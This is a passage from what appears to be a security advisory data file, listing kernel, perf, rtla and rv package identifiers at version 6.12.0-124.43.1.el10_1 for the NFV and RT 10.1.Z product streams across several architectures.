"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
